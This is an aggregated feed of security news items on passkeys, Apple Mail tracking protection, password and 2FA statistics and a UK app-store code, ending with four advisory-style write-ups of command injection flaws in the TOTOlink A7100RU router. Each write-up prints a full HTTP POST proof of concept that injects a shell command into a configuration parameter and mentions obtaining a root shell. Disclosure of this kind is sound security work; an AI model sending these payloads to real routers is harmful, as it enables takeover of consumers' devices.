Apple, Google and Microsoft announced this week they will soon support an approach to authentication that avoids passwords altogether, and instead requires users to merely unlock their smartphones to sign in to websites or online services. Experts say the changes should help defeat many types of phishing attacks and ease the overall password burden on Internet users, but caution that a true passwordless future may still be years away for most websites.

**Apple**, **Google** and **Microsoft** announced this week they will soon support an approach to authentication that avoids passwords altogether, and instead requires users to merely unlock their smartphones to sign in to websites or online services. Experts say the changes should help defeat many types of phishing attacks and ease the overall password burden on Internet users, but caution that a true passwordless future may still be years away for most websites.

Image: Blog.google

The tech giants are part of an industry-led effort to replace passwords, which are easily forgotten, frequently stolen by malware and phishing schemes, or leaked and sold online in the wake of corporate data breaches.

Apple, Google and Microsoft are some of the more active contributors to a passwordless sign-in standard crafted by the FIDO (“Fast Identity Online”) Alliance and the World Wide Web Consortium (W3C), groups that have been working with hundreds of tech companies over the past decade to develop a new login standard that works the same way across multiple browsers and operating systems.

According to the FIDO Alliance, users will be able to sign in to websites through the same action that they take multiple times each day to unlock their devices — including a device PIN, or a biometric such as a fingerprint or face scan.

“This new approach protects against phishing and sign-in will be radically more secure when compared to passwords and legacy multi-factor technologies such as one-time passcodes sent over SMS,” the alliance wrote on May 5.

**Sampath Srinivas**, director of security authentication at Google and president of the FIDO Alliance, said that under the new system your phone will store a FIDO credential called a “passkey” which is used to unlock your online account.

“The passkey makes signing in far more secure, as it’s based on public key cryptography and is only shown to your online account when you unlock your phone,” Srinivas wrote. “To sign into a website on your computer, you’ll just need your phone nearby and you’ll simply be prompted to unlock it for access. Once you’ve done this, you won’t need your phone again and you can sign in by just unlocking your computer.”

As _ZDNet_ notes, Apple, Google and Microsoft already support these passwordless standards (e.g. “Sign in with Google”), but users need to sign in at every website to use the passwordless functionality. Under this new system, users will be able to automatically access their passkey on many of their devices — without having to re-enroll every account — and use their mobile device to sign into an app or website on a nearby device.

**Johannes Ullrich**, dean of research for the SANS Technology Institute, called the announcement “by far the most promising effort to solve the authentication challenge.”

“The most important part of this standard is that it will not require users to buy a new device, but instead they may use devices they already own and know how to use as authenticators,” Ullrich said.

**Steve Bellovin**, a computer science professor at Columbia University and an early internet researcher and pioneer, called the passwordless effort a “huge advance” in authentication, but said it will take a very long time for many websites to catch up.

Bellovin and others say one potentially tricky scenario in this new passwordless authentication scheme is what happens when someone loses their mobile device, or their phone breaks and they can’t recall their iCloud password.

“I worry about people who can’t afford an extra device, or can’t easily replace a broken or stolen device,” Bellovin said. “I worry about forgotten password recovery for cloud accounts.”

Google says that even if you lose your phone, “your passkeys will securely sync to your new phone from cloud backup, allowing you to pick up right where your old device left off.”

Apple and Microsoft likewise have cloud backup solutions that customers using those platforms could use to recover from a lost mobile device. But Bellovin said much depends on how securely such cloud systems are administered.

“How easy is it to add another device’s public key to an account, without authorization?” Bellovin wondered. “I think their protocols make it impossible, but others disagree.”

**Nicholas Weaver**, a lecturer at the computer science department at **University of California, Berkeley**, said websites still have to have some recovery mechanism for the “you lost your phone and your password” scenario, which he described as “a really hard problem to do securely and already one of the biggest weaknesses in our current system.”

“If you forget the password and lose your phone and can recover it, now this is a huge target for attackers,” Weaver said in an email. “If you forget the password and lose your phone and CAN’T, well, now you’ve lost your authorization token that is used for logging in. It is going to have to be the latter. Apple has the infrastructure in place to support it (iCloud keychain), but it is unclear if Google does.”

Even so, he said, the overall FIDO approach has been a great tool for improving both security and usability.

“It is a really, really good step forward, and I’m delighted to see this,” Weaver said. “Taking advantage of the phone’s strong authentication of the phone owner (if you have a decent passcode) is quite nice. And at least for the iPhone you can make this robust even to phone compromise, as it is the secure enclave that would handle this and the secure enclave doesn’t trust the host operating system.”

The tech giants said the new passwordless capabilities will be enabled across Apple, Google and Microsoft platforms “over the course of the coming year.” But experts said it will likely take several more years for smaller web destinations to adopt the technology and ditch passwords altogether.

Recent research shows far too many people still reuse or recycle passwords (modifying the same password slightly), which presents an account takeover risk when those credentials eventually get exposed in a data breach. A report in March from cybersecurity firm **SpyCloud** found 64 percent of users reuse passwords for multiple accounts, and that 70 percent of credentials compromised in previous breaches are still in use.

A March 2022 white paper on the FIDO approach is available here (PDF). A FAQ on it is here.

Your Phone May Soon Replace Many of Your Passwords

If you don’t like marketers (or anyone else) knowing when and where you read your email, Apple’s feature will help you reclaim some privacy.

Nothing makes you more paranoid about privacy than working in a marketing department. Trust me on this. For example, did you know that marketers track every time you open an email newsletter—and where you were when you did it?

Apple caused a small panic among marketers in September 2021 by effectively making this tracking impossible in the default Mail app on iPhone, iPad, and Mac. I, personally, switched to Apple Mail as soon as the feature was announced. You might feel the same way, but marketers feel as though they've lost a useful tool.

"If I start a conversation with somebody and they're not responding to me, I'm going to stop talking to them at some point," says Simon Poulton, vice president of digital intelligence at marketing agency Wpromote. "But if someone is nodding along, I'm going to keep talking."

Tracking email opens, to Poulton, is a way for marketers to see who is, and isn't, listening—and adjust their strategy accordingly.

Privacy advocates feel differently. Bill Budington, senior staff technologist at the Electronic Frontier Foundation, says tracking is bad for privacy, and he's pleased that “Apple Mail now provides tools to take your privacy back.”

Let’s talk more about what, exactly, this feature does—and what it means for you.

How Email Tracking Works (and How Apple Blocks It)

If you're really freaking old—36, say—you might recall some ’90s email clients couldn't open certain emails with formatting. You'd instead be prompted to open the email in your web browser. There's a reason for this.

Email dates back to the ’70s, when computers couldn't display much in the way of graphics. Because of this, email protocols are more or less designed for simple text messages with attachments—which works until you want to add things like colors and images. By the ’90s, a workaround showed up: adding HTML code to an email message that points to images hosted on servers.

I bring this history up only because it's what makes modern email tracking possible. Most email newsletters you get include an invisible “image,” typically a single white pixel, with a unique file name. The server keeps track of every time this “image” is opened and by which IP address. This quirk of internet history means that marketers can track exactly when you open an email and your IP address, which can be used to roughly work out your location.

So, how does Apple Mail stop this? By caching. Apple Mail downloads all images for all emails before you open them. Practically speaking, that means every message downloaded to Apple Mail is marked “read,” regardless of whether you open it. Apples also routes the download through two different proxies, meaning your precise location also can't be tracked.

Apple’s Been Adding Features Like This for a While

So did this catch marketers off guard? Kind of.

“The Apple Mail thing specifically kind of came out of left field,” Poulton tells me, “but the whole idea of the de-identification of users is something we've been planning on for a while. This is a multipronged attack from Apple.”

Apple Mail Now Blocks Email Tracking. Here’s What That Means

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 29 and May 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for April 29 to May 6

For most of us, passwords are the most visible security control we deal with on a regular basis, but we are not very good at it.

Whether we as a whole are doing better or worse in terms of password security is still unclear, but one thing is certain: We are clearly overconfident in our perceptions about our security activities.  

With adversaries increasingly targeting passwords to break into online accounts or gain access to corporate networks, people are both more aware about password security yet not doing enough to secure their credentials. Two-thirds of respondents (66%) in a recent password security survey conducted by Ipsos on behalf of Google said they use completely random passwords with a mix of characters, but 65% also said they reuse passwords for different online accounts.

There is some indication that users are using technology to improve password security: Sixty-one percent of respondents said they sign into sites using another service (such as Apple ID or Google accounts), according to the Google/Ipsos survey, and 44% said they use a password manager service. Yet 63% said they track passwords by writing them down on paper or making a note on their mobile devices.   

**Who Has 2FA?  
**Two-factor authentication (2FA) is another head-scratcher. Almost three-quarters (73%) of respondents say they use 2FA at least some of the time, but the adoption numbers from individual services tell a different story. Just 2.5% of active Twitter accounts had at least one 2FA method enabled as of June 2021, according to the social media company’s transparency report. Only 16.5% of active GitHub users and 6.44% of npm users have enabled one or more forms of 2FA on their accounts, according to Microsoft-owned GitHub. 

Perhaps the figures indicating a high rate of adoption for multifactor authentication (MFA) are skewed by the gamers on platforms that offer incentives to enable them. In a 2019 study on adoption rates for 2FA, 56.7% of the respondents had a Blizzard account, of which 43.1% had activated 2FA authentication; 88.1% had a Steam account, of which 62.6% had activated 2FA; and 65.6% had a Guild Wars 2 account, of which 55% had activated 2FA. Compare that to 87.7% of respondents who had a Reddit account, but only 11.5% had activated 2FA.

There is a bit of a disconnect on the corporate side, too. In a recent study on identity management by ESG, 58% of organizations said they have implemented MFA, while 23% ranked MFA as the most effective identity and access management solution. Yet Microsoft said in its Cyber Signals report earlier this year that only 22% of all its Azure Active Directory customers use MFA.

In the same ESG report, 32% of organizations said they make MFA optional for employees, and 27% treat MFA as optional for third-party contractors and workers.

The post-mortem investigation of the ransomware incident at Colonial Pipeline found the attack succeeded because the compromised account did not have MFA enabled, says Bojan Simic, CEO and CTO of HYPR. In fact, while defense contractors should have also implemented MFA five years ago, many have not fully implemented it.

“MFA projects frequently exist on a planning chart only,” Simic says.

Passwords: Do Actions Speak Louder Than Words?

NCSC proposes new code of conduct for app stores

NCSC proposes new code of conduct for app stores

  

A report from the UK government has laid bare the risks of malicious mobile apps, as lawmakers call for tougher protections for consumers.

The report (PDF), published by the UK National Cyber Security Centre (NCSC), found that “people’s data and money are at risk because of fraudulent apps containing malicious malware created by cybercriminals or poorly developed apps which can be compromised by hackers exploiting weaknesses in software”.

The study, which conducted a review into the app store ecosystem from December 2020 to March 2022, detailed how 87% of UK citizens now own a smartphone, conveying a widespread attack surface.

Read more of the latest security news from the UK

“\[M\]alicious and poorly developed apps continue to be accessible to users, therefore it is evident that some developers are not following best practice when creating apps,” the NCSC claims.

“Additionally, prominent app store operators are not adequately signposting app requirements to developers and providing detailed feedback if an app or update is rejected.”

**New rules**

In response to the findings, the government is calling views from the tech industry on enhanced security and privacy requirements for firms running app stores and developers making apps.

Under new proposals, app stores for smartphones, game consoles, TVs and other smart devices could be asked to commit to a new code of practice setting out baseline security and privacy requirements, which the UK says “would be the first such measure in the world”.

RELATED UK government reveals plans to become ‘global cyber power’ in 2022

Developers and store operators making apps available to UK users would be covered including Apple, Google, Amazon, Huawei, Microsoft, and Samsung.

The proposed policy would require stores to have a vulnerability reporting process for each app available. They would also be required to share more security and privacy information in an accessible way, including giving consumers information on matters such as why an app would need access to users’ contacts and location.

NCSC technical director Ian Levy commented: “Our threat report shows there is more for app stores to do, with cybercriminals currently using weaknesses in app stores on all types of connected devices to cause harm.

“I support the proposed code of practice, which demonstrates the UK’s continued intent to fix systemic cybersecurity issues.”

**‘Crucial awareness’**

Filip Verloy, EMEA technical evangelist at Noname Security, commented: “These types of initiatives raise crucial awareness of the security issues that we currently face and provide a healthy and necessary debate on the subject. This should prove useful even if it only accomplishes just that.

“However, there are a few flaws to the measures proposed. Firstly, Apple has already made it a point of differentiation to prioritize privacy and security and perform extensive moderation in their app store versus competitors.

“Secondly, there is no such thing as 100% certainty about security when it comes to software, though laying out best practices and increasing scrutiny will certainly help weed out the worst offenders.”

YOU MAY ALSO LIKE UK government employees receive ‘billions’ of malicious emails per year – report

UK government calls for tougher protections against malicious mobile apps

The passwordless future just became closer to reality, as Microsoft, Apple, and Google pledge to make the standard possible across operating systems and browsers.

Apple, Google, and Microsoft will expand support for FIDO Alliance's passwordless standard to make logins easier across mobile devices and desktops.

By expanding support for the password-free sign-in standard from the FIDO Alliance and the World Wide Web (W3) Consortium, Google, Microsoft, and Apple will make it possible for anyone to use their mobile device to sign into an app or website on a nearby device. More importantly, users will be able to access passkeys – their FIDO sign-in credentials – across multiple devices without having to re-enroll every account on each device. This will be a key change from the current reality, where users have to sign into each website or app with each device before they can take advantage of the passwordless feature.

"We plan to implement passwordless support for FIDO Sign-in standards in Android & Chrome. Apple and Microsoft have also announced that they will offer support for their platforms," writes Sampath Srinivas, a product management director for secure authentication at Google and the president of the FIDO Alliance. "This will simplify sign-ins across devices, websites, and applications no matter the platform — without the need for a single password. These capabilities will be available over the course of the coming year."

**Case for No More Passwords**  
Passwords do not provide sufficient security – they can be stolen or guessed if the password itself isn't very good. Weak passwords accounted for more than 80% of all data breaches, according to Verizon's annual Data Breach Investigations Report. Passwords are the single largest attack vector and the root cause of most attacks -- including account takeovers, advanced persistent threats, and ransomware, says Jasson Casey, CTO of Beyond Identity. Four out of five times adversaries rely on stolen credentials for initial access and lateral movement, he says.

"Password-based authentication has failed us. Full stop," Casey says.  

There are more than 921 password attacks every second, writes Vasu Jakkal, corporate vice president of security, compliance, identity, and management at Microsoft. That represents more than double the figure over the past 12 months.

A new Google/Ipsos survey found that one in three Americans share passwords with someone else or have access to someone else's passwords, and 65% of respondents say they reuse passwords. One in five use common words or easy-to-guess terms for passwords, and 52% say they incorporate personal information such as name and birthday into the password.

"The alternatives \[to passwords\] often are unworkable, unwieldy, or just not likely to be adopted by consumers, especially the non-tech-savvy ones or those who are on the lower end of the socio-economic scale," says John Bambenek, principal threat hunter at Netenrich.  

Passwords are still ubiquitous despite the issues because they are relatively easy to implement and people know how to use them, which is why passwords still haven't gone away. Instead, security teams rely on technologies such as multifactor authentication and password managers to provide additional protection to strengthen the security around accounts, platforms, and data. 

However, these controls have made "marginal security gains," Casey says, mainly because they still rely on passwords and the second factors can be intercepted via social engineering methods (such as one-time passwords sent over SMS).

**Cross-Platform Passwordless**  
The good news is that technology is now in place to make passwordless authentication a reality, Casey says. Secure enclaves are prevalent (and resident in nearly every device), and almost all enterprise and consumer apps can leverage secure enclaves to easily delegate passwordless authentication.

The announcement from Google, Microsoft, and Apple indicates the expanded support will be implemented in macOS and Safari, Android and Chrome, and Windows and Edge. The actions used to unlock the mobile device — such as fingerprint, face scan, and device PIN — will give access to the passkey stored on the device. Signing in with the passkey is more secure because it's based on public key cryptography, Srinivas says. Even if the device is lost, the passkeys will sync back to the mobile device from cloud backup, he says.

All of this will be cross-platform. Ideally, a user would be able to sign into a website via Google Chrome on a Windows machine using a passkey on an Apple device.

"This new approach protects against phishing and sign-in will be radically more secure when compared to passwords and legacy multi-factor technologies such as one-time passcodes sent over SMS," the FIDO Alliance said in a statement.  

Implementations that rely on secure enclaves, especially those already built into modern devices, such as the Trusted Platform Module on laptops and desktops, combined with the security posture of the device itself make passwordless authentication a reality, Casey says.

Jennifer Easterly, director of the US Cybersecurity and Infrastructure Security Agency (CISA), praises the announcement, calling it "the type of forward-leaning thinking that will ultimately keep the American people safer online."

Passwordless needs to be easy. "If you don’t consider usability, your users will create your next vulnerability," Casey warns.

Microsoft, Apple, and Google Promise to Expand Passwordless Features

It is found that there is a command injection vulnerability in the setWiFiAdvancedCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the merge parameter to V2, and then brings V2 into UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiAdvancedCfg",
    "merge":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28581: IOT_vuln/TOTOLink/A7100RU/9 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiSignalCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V3 parameter, then assigns V3 to V6, and finally brings V6 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiSignalCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28582: IOT_vuln/TOTOLink/A7100RU/6 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiWpsCfg interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by the wscdisabled parameter to the V5 parameter, and then brings V5 into UCI\_ Set\_ STR function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsCfg",
    "wscDisabled":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28583: IOT_vuln/TOTOLink/A7100RU/7 at main · EPhaha/IOT_vuln

It is found that there is a command injection vulnerability in the setWiFiWpsStart interface in TOTOlink A7100RU (v7.4cu.2313_b20191024) router, which allows an attacker to execute arbitrary commands through a carefully constructed payload.

**TOTOlink A7100RU Command injection vulnerability****Overview**

*   Manufacturer's website information：http://totolink.net/
*   Firmware download address ： http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**2.Vulnerability details**

The program passes the content obtained by htbsscoexistence parameter to V15, and then brings V15 to UCI\_ Set\_ In str function

Format the A4 matched content into V11 through snprintf function, and then bring V11 into cstesystem function

The function directly brings user input into the execv function, which has a command injection vulnerability

**3.Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V7.4cu.2313\_B20191024
2.  Attack with the following overflow POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setWiFiWpsStart",
    "htBSSCoexistence":"1$(ls>/tmp/123;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

Tag

#apple